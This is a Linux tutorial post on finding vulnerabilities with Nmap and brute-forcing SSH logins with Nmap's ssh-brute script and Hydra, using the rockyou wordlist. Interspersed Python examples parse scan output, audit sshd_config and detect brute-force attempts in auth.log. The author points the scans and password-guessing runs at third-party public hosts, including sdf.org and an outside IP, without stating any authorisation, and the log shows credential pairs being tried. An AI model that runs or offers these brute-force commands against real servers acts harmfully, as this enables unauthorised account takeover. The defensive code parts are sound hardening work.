

Finding some nice vulnerabilities with Nmap on Linux.


It is very easy to find vulnerabilities on remote servers using Nmap. The example below is a scan of a Fedora machine running an Apache web server.

┗━━━━━━━━━━┓ john@localhost ~/Documents
           ┗━━━━━━━━━━━━━╾ ╍▷ nmap -Pn --script vuln 192.168.1.2
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 08:46 AEST
Nmap scan report for 192.168.1.2
Host is up (0.00015s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp open  rpcbind
 
Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds

The --script vuln option runs every NSE script in the vuln category against each open port Nmap finds; the http-* lines above are those scripts reporting on port 80. It finds only what those scripts test for, and a script can also fail outright, as http-vuln-cve2017-1001000 did here.

This is very useful for scanning your own server to find problems in its security configuration, such as the enabled TRACE method and the browsable /icons/ directory reported above.
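As an added example that is not part of the original post, here is a small Python parser for Nmap's normal-mode output as shown above; it separates the results worth acting on (TRACE enabled, the directory listing) from the "Couldn't find" results and script errors. The sample scan text is a constructed copy of the Fedora results.

```python
import re
# Constructed sample: the port table and script results from the Fedora scan above.
SAMPLE_SCAN = """\
22/tcp  open  ssh
80/tcp  open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp open  rpcbind
"""
PORT_RE = re.compile(r"^\d+/(tcp|udp)\s+\S+\s+\S+")      # "80/tcp  open  http"
SCRIPT_RE = re.compile(r"^([\w.-]+):\s*(.*)$")            # "http-trace: TRACE is enabled"
NEGATIVE = ("couldn't find", "no vulnerabilit", "not vulnerable")
def classify(text):
    """'finding' needs a human look, 'clean' means the script found nothing, 'error' means it never ran."""
    low = text.lower()
    if low.startswith("error:"):
        return "error"
    if not low or any(p in low for p in NEGATIVE):
        return "clean"
    return "finding"
def parse_vuln_scan(text):
    """Turn nmap's normal output into a list of {port, script, text, status} dicts."""
    findings, port, current = [], None, None
    for line in text.splitlines():
        if PORT_RE.match(line):
            port, current = line.split()[0], None
            continue
        if not line.startswith("|"):
            continue
        body = line[1:].lstrip("_")
        if body.startswith("  ") and current is not None:
            # indented continuation line: belongs to the script reported just above
            current["text"] = (current["text"] + " " + body.strip()).strip()
            continue
        m = SCRIPT_RE.match(body.strip())
        if m:
            current = {"port": port, "script": m.group(1), "text": m.group(2).strip()}
            findings.append(current)
    for f in findings:
        f["status"] = classify(f["text"])
    return findings
def actionable(findings):
    # only the results worth fixing, e.g. TRACE enabled or an exposed directory listing
    return [f for f in findings if f["status"] == "finding"]
```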

This is another example.

┗━━━━━━━━━━┓ john@localhost ~/Documents
           ┗━━━━━━━━━━━━━╾ ╍▷ nmap -Pn --script vuln 104.236.193.132
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-19 09:05 AEST
Nmap scan report for bulmacss.scan.leakix.org (104.236.193.132)
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
646/tcp filtered ldp
 
Nmap done: 1 IP address (1 host up) scanned in 573.77 seconds

This server has SSH open on the default port. The command below will attempt to brute force the SSH credentials on the remote server.

nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s 104.236.193.132

But on this server password authentication is not allowed, so there is nothing for ssh-brute to try.

╭──(john㉿DESKTOP-PF01IEE)-[~]
╰───────────────────────────╾┋ nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s 104.236.193.132
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 09:32 AEST
Nmap scan report for bulmacss.scan.leakix.org (104.236.193.132)
Host is up (0.24s latency).
 
PORT   STATE SERVICE
22/tcp open  ssh
|_ssh-brute: Password authentication not allowed
 
Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
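The "Password authentication not allowed" result above is what a hardened sshd_config produces. As an added example that is not from the original post, the Python below audits the sshd_config keywords that decide whether a password guess can succeed at all; the two config fragments are constructed, and KbdInteractiveAuthentication is checked as well because with PAM that path still prompts for a password even when PasswordAuthentication is off.

```python
# Constructed sshd_config fragments: one still takes passwords, one is hardened.
WEAK_CONFIG = """\
# A commented-out keyword means the compiled-in default applies (yes here)
#PasswordAuthentication yes
PermitRootLogin yes
"""
HARDENED_CONFIG = """\
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
MaxAuthTries 3
PubkeyAuthentication yes
"""
# OpenSSH defaults for the keywords that decide whether a password guess can succeed
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",  # PAM password prompts use this path, so it must be off too
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
}
POLICY = {
    "passwordauthentication": lambda v: v == "no",
    "kbdinteractiveauthentication": lambda v: v == "no",
    "permitrootlogin": lambda v: v in ("no", "prohibit-password", "without-password"),
    "maxauthtries": lambda v: v.isdigit() and int(v) <= 3,
}
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}  # older spelling

def parse_sshd_config(text):
    """Effective top-level values. sshd honours the FIRST occurrence of a keyword,
    and anything after a Match line is conditional, so parsing stops there."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = ALIASES.get(parts[0].lower(), parts[0].lower())
        if key == "match":
            break
        if len(parts) == 2:
            settings.setdefault(key, parts[1].strip().lower())
    return settings
def audit_sshd_config(text):
    """Return {keyword: (effective_value, compliant)} for the password-guessing keywords."""
    settings = parse_sshd_config(text)
    return {k: (settings.get(k, d), POLICY[k](settings.get(k, d))) for k, d in DEFAULTS.items()}
def is_hardened(text):
    return all(ok for _, ok in audit_sshd_config(text).values())
```

Run it against the real file with `is_hardened(open("/etc/ssh/sshd_config").read())`; anything re-enabled inside a Match block still needs a manual look.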

But if the server does allow password authentication, ssh-brute will start working through username/password pairs. Note the pairs in the output below (root:root, admin:admin, then blank passwords, then 123456): these come from Nmap's built-in usernames.lst and passwords.lst rather than rockyou.txt, because only the last --script-args on the command line takes effect. Put userdb, passdb and ssh-brute.timeout together in a single --script-args to use the wordlist.

╭──(john㉿DESKTOP-PF01IEE)-[~]
╰───────────────────────────╾┋ nmap -p 22 --script ssh-brute.nse --script-args userdb=rockyou.txt,passdb=rockyou.txt --script-args ssh-brute.timeout=4s sdf.org
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-19 09:39 AEST
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:
NSE: [ssh-brute] Trying username/password pair: sysadmin:
NSE: [ssh-brute] Trying username/password pair: netadmin:
NSE: [ssh-brute] Trying username/password pair: guest:
NSE: [ssh-brute] Trying username/password pair: user:
NSE: [ssh-brute] Trying username/password pair: web:
NSE: [ssh-brute] Trying username/password pair: test:
NSE: [ssh-brute] Trying username/password pair: root:123456
NSE: [ssh-brute] Trying username/password pair: admin:123456
NSE: [ssh-brute] Trying username/password pair: administrator:123456
NSE: [ssh-brute] Trying username/password pair: webadmin:123456
NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
NSE: [ssh-brute] Trying username/password pair: netadmin:123456
NSE: [ssh-brute] Trying username/password pair: guest:123456
NSE: [ssh-brute] Trying username/password pair: user:123456
NSE: [ssh-brute] Trying username/password pair: web:123456
NSE: [ssh-brute] Trying username/password pair: test:123456
NSE: [ssh-brute] Trying username/password pair: root:12345
NSE: [ssh-brute] Trying username/password pair: admin:12345
NSE: [ssh-brute] Trying username/password pair: administrator:12345
NSE: [ssh-brute] Trying username/password pair: webadmin:12345
NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
NSE: [ssh-brute] Trying username/password pair: netadmin:12345
NSE: [ssh-brute] Trying username/password pair: guest:12345
NSE: [ssh-brute] Trying username/password pair: user:12345
NSE: [ssh-brute] Trying username/password pair: web:12345
NSE: [ssh-brute] Trying username/password pair: test:12345
NSE: [ssh-brute] Trying username/password pair: root:123456789
NSE: [ssh-brute] Trying username/password pair: admin:123456789
NSE: [ssh-brute] Trying username/password pair: administrator:123456789
NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789

Hydra is another way to try and crack an SSH password.

╭──(john㉿DESKTOP-PF01IEE)-[~]
╰───────────────────────────╾┋ hydra -l john -P rockyou.txt ssh://192.168.1.2
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-19 09:54:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
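From the server side, a Hydra run like the one above shows up in auth.log as a burst of "Failed password" lines from a single address against one account. As an added example that is not from the original post, the Python below applies a sliding-window count to a constructed auth.log excerpt and flags the source; the hostname, PIDs and addresses in the sample are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt: one host hammering the "john" account (what the Hydra
# run above looks like from the server side), one ordinary failure, one key login.
SAMPLE_LOG = [
    "Apr 19 09:54:17 fedora sshd[2200]: Failed password for john from 10.0.0.5 port 50001 ssh2",
    "Apr 19 09:55:02 fedora sshd[2250]: Accepted publickey for john from 192.168.1.20 port 40011 ssh2",
] + [
    f"Apr 19 09:54:{20 + i:02d} fedora sshd[{2300 + i}]: Failed password for john "
    f"from 192.168.1.10 port {51000 + i} ssh2"
    for i in range(12)
] + [
    "Apr 19 11:30:40 fedora sshd[2400]: Failed password for invalid user admin from 10.0.0.5 port 50002 ssh2",
]

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

def parse_ts(stamp, year=2023):
    # syslog stamps carry no year; assume one (the constructed sample is from 2023)
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, window_s=60, threshold=10):
    """Sliding-window count of failed passwords per source IP. Returns, for every IP
    whose peak inside any window_s-second window reached threshold, that peak and
    the usernames it tried (one user with many tries is the Hydra -l pattern)."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the current window
    peak, users = defaultdict(int), defaultdict(set)
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        ip, ts = m["ip"], parse_ts(m["ts"])
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
        users[ip].add(m["user"])
    return {ip: {"peak_per_window": n, "users": sorted(users[ip])}
            for ip, n in peak.items() if n >= threshold}
```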

On Kali Linux, install the wordlists package with sudo apt install wordlists. rockyou.txt ships compressed, so unpack it with zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt before pointing Nmap or Hydra at it.

╭──(john㉿DESKTOP-PF01IEE)-[~]
╰───────────────────────────╾┋ sudo apt install wordlists
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  wordlists
0 upgraded, 1 newly installed, 0 to remove and 4 not upgraded.
Need to get 53.4 MB of archives.
After this operation, 53.4 MB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 wordlists all 2023.1.2 [53.4 MB]
Fetched 52.5 MB in 1min 39s (528 kB/s)                                                                                                                                                                                                                                                
Selecting previously unselected package wordlists.
(Reading database ... 153362 files and directories currently installed.)
Preparing to unpack .../wordlists_2023.1.2_all.deb ...
Unpacking wordlists (2023.1.2) ...
Setting up wordlists (2023.1.2) ...

Then unpack the wordlist ready for use.

╭──(john㉿DESKTOP-PF01IEE)-[~]
╰───────────────────────────╾┋ zcat /usr/share/wordlists/rockyou.txt.gz > rockyou.txt
